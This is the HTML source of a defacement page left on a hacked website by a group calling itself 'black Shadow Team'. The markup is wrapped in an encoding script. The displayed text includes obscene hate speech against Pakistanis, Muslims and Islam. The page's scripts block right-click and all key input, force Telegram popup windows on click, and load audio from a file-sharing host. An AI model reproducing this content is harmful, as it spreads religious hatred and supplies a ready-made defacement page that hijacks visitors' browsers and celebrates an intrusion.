<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<html><head>
<meta property="og:image" content="https://i.imgur.com/qlhxNMr.jpg">
<link rel="icon" href="https://i.imgur.com/PFxAtIi.png">
<meta content='Hacked by black Shadow Offical Support' name='description' />
<meta content='Hacked By Indian Shadow Hackers Team' name='keywords' />
<meta content='Hacked By Indian Shadow Hackers Team' name='Abstract' />
<meta name="title" content="Hacked by black Shadow Offical Support Team">
<meta property="og:site_name" content="Hacked by black Shadow Offical Support Team">
<meta property="og:title" content="Hacked by black Shadow Offical Support Team">
<meta name="twitter:image" content="https://i.imgur.com/mF8EgEV.png">
<meta property="og:description" content="black Shadow Team was here!" />
<meta name="description" content="black Shadow Team was here!">
<meta name="keywords" content="black Shadow Team">
<meta name="googlebot" content="index,follow" />
<meta name="robots" content="all" />
<meta name="robots schedule" content="auto" />
<meta name="distribution" content="global" />
<title>Hacked By Indian Shadow Hackers Team</title>
<meta name="robots" content="all" /><meta name="robots schedule" content="auto" />
<meta name="distribution" content="global" /><link href="https://fonts.googleapis.com/css?family=Share+Tech+Mono|Rajdhani|Oswald:700|Iceland|PT+Sans&display=swap" rel="stylesheet" type="text/css">
<base target='_blank' /><body><center>
<meta content='width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;' name='viewport' />
<meta name="viewport" content="width=device-width" />
<style>
    *{font-family: Iceland, sans-serif !important;}
</style>
<style>
    body { overflow-x:hidden; }
.gambargetar{position:relative}
img:hover{opacity:1}textarea{resize:none}
img {
    position:relative;opacity:1.0
}
</style>
<style type="text/css">
@media only screen and (max-device-width: 480px) {
html, body {
  overflow-x: hidden;
}
body {
  position: relative;
}
    img {    
    weight: 100%;
    position: relative;
    margin: -4;
}
</style>
<style type="text/css">body, a:hover {cursor: url(https://cur.cursors-4u.net/cursors/cur-7/cur686.cur), progress !important;}</style>
</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
  #mouse-circle {
    position: absolute;
    width: 32px;
    height: 32px;
    margin: -16px 0 0 -16px;
    border: 1px solid yellow;
    border-radius: 50%;
    pointer-events: none;
}
   body,td,th {
   color: #000;
   margin: 0;
   padding: 0;
   height: 100%;
   position: relative;
   font-family: 1877;
   background-color:#000000;
   }
</style>
<body oncontextmenu="return false;">
</body>
<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
<FONT size="3" color=#FFFF00 style="text-shadow: 0px 1px 30px white;"><CENTER><BIG>★ <FONT size="3" color=white><BIG>★</BIG></FONT> ★ <FONT size="3" color=white><BIG>★</BIG></FONT> ★ <FONT size="3" color=white><BIG>★</BIG></FONT> ★</BIG></CENTER></FONT>
<div style="line-height:40%;">
<br>
</div>
<div id="mouse-circle"></div>
<img src="https://i.imgur.com/zty1xBG.gif" width="350" style="border-right: 2px white solid;border-left: 2px yellow solid;border-top: 2px yellow solid;border-bottom: 2px white solid;object-fit: scale-down; max-width: 100%; border-radius: 0%;text-shadow: 0px 1px 30px white;" onclick="location.href = 'https://t.me/UnderCover_Squad';">
<div style="line-height:50%;">
<style>
img {
  animation: shake 4.0s;
  animation-iteration-count: infinite;
}

center {
    animation: shake 4.0s;
  animation-iteration-count: infinite;
}

@keyframes shake {
  0% { transform: translate(1px, 1px) rotate(0deg); }
  10% { transform: translate(-1px, -2px) rotate(-1deg); }
  20% { transform: translate(-3px, 0px) rotate(1deg); }
  30% { transform: translate(3px, 2px) rotate(0deg); }
  40% { transform: translate(1px, -1px) rotate(1deg); }
  50% { transform: translate(-1px, 2px) rotate(-1deg); }
  60% { transform: translate(-3px, 1px) rotate(0deg); }
  70% { transform: translate(3px, 1px) rotate(-1deg); }
  80% { transform: translate(-1px, -1px) rotate(1deg); }
  90% { transform: translate(1px, 2px) rotate(0deg); }
  100% { transform: translate(1px, -2px) rotate(-1deg); }
}
</style>
<br>
</div>
<div id="center"> <font color="white" size="7" face="Share Tech Mono" style="text-shadow: 0px 1px 30px white;">Hacked by <font color=#FFFF00> </font> <a style="text-decoration:none" href="https://t.me/x1877x"> <font color=#FFFF00 style="text-shadow: 0px 1px 30px #FFFF00;"> black Shadow Team</a></font>
<div style="line-height:30%;">
<br>
</div>
<div id="center"> <font color="white" size="6" face="Share Tech Mono" style="text-shadow: 0px 1px 30px white;">Hey Stupid Kid's of Pakistan Respect us We are Indian!<br>Stop Terrorist Attacks on India Else get Lost,<br>Now <mark>Fuck you ! Fuck Islam ! Fuck Muslim ! Fuck your Allah @remember us .</mark></a></div>
<div style="line-height:30%;">
</div>
<FONT color=#FF0000></font>
</body>
</center>
<body onclick="popup()">
<style type="text/css">
.INDIAN Hackers{ 
background:transparent;
border:3px solid white;
text-shadow:0px 0px 5px yellow;
border-radius:13px; font-family:Share Tech Mono;
color:yellow; font-size:18x; font-weight:bold; padding:3px 29px; text-decoration:none; text-shadow:0px 0px 20px #dbe600;height:40px;width:110px; } </style>
<center>
<div style="line-height:70%;">
<br>
</div>
<audio id="INDIAN Hackers" src="https://transfer.sh/get/5gBXj5/x1877xx.mp3"></audio>
</audio>
<button class="INDIAN Hackers" onclick="play();x1877x();"><font size="4" color="White">PLAY</font></button> <button class="INDIAN Hackers" onclick="pause(); x1877x();"><font size="4" color="white">PAUSE</font></button> <audio id="INDIAN Hackers" src="https://transfer.sh/get/5gBXj5/x1877xx.mp3"></audio> </audio>
<div style="line-height:50%;">
<br>
</div>
<marquee width="400" scrollamount="12" behavior="scroll" direction="left"><font color="yellow" size="6" face="Share Tech Mono" style="text-shadow: 0px 1px 30px yellow;">INDIAN Hackers </font><font color="white" size="6" face="Share Tech Mono" style="text-shadow: 0px 1px 30px white;">Website Hacked by black Shadow Team</font></marquee>
<div style="line-height:30%;">
<br>
</div>
<font color="white" size="5" face="Share Tech Mono" style="text-shadow: 0px 1px 30px white;">-=-=-=-=-=-=-=-=-</font>
</center>
<script>
    document.addEventListener('DOMContentLoaded', () => {
    let mousePosX = 0,
        mousePosY = 0,
        mouseCircle = document.getElementById('mouse-circle');

    document.onmousemove = (e) => {
        mousePosX = e.pageX;
        mousePosY = e.pageY;
    }

    let delay = 8,
        revisedMousePosX = 0,
        revisedMousePosY = 0;

    function delayMouseFollow() {
        requestAnimationFrame(delayMouseFollow);

        revisedMousePosX += (mousePosX - revisedMousePosX) / delay;
        revisedMousePosY += (mousePosY - revisedMousePosY) / delay; 

        mouseCircle.style.top = revisedMousePosY + 'px';
        mouseCircle.style.left = revisedMousePosX + 'px';
    }
    delayMouseFollow();
});
    document.addEventListener("contextmenu", function(e){
        e.preventDefault();
    }, false);
    </script>
    <script>
  document.onkeydown = function (e) {
          return false;
  }
  </script>
  <script type="text/javascript">
    var popup = function() {
        window.open ("https://t.me/UnderCover_Squad", "Window","status=1,toolbar=1");
        window.open ("https://t.me/UnderCover_Squad_Group", "Window2","status=1,toolbar=1");
    }
</script>
<script> function play(){ var audio = document.getElementById('INDIAN Hackers'); audio.play(); } function x1877x(){ document.getElementById('INDIAN Hackersxx').style.visibility='visible'; } function pause(){ var audio = document.getElementById('INDIAN Hackers'); audio.pause(); } function x1877x(){ document.getElementById('INDIAN Hackersxx').style.visibility='visible'; }</script>
</html>'));
//-->
</script>
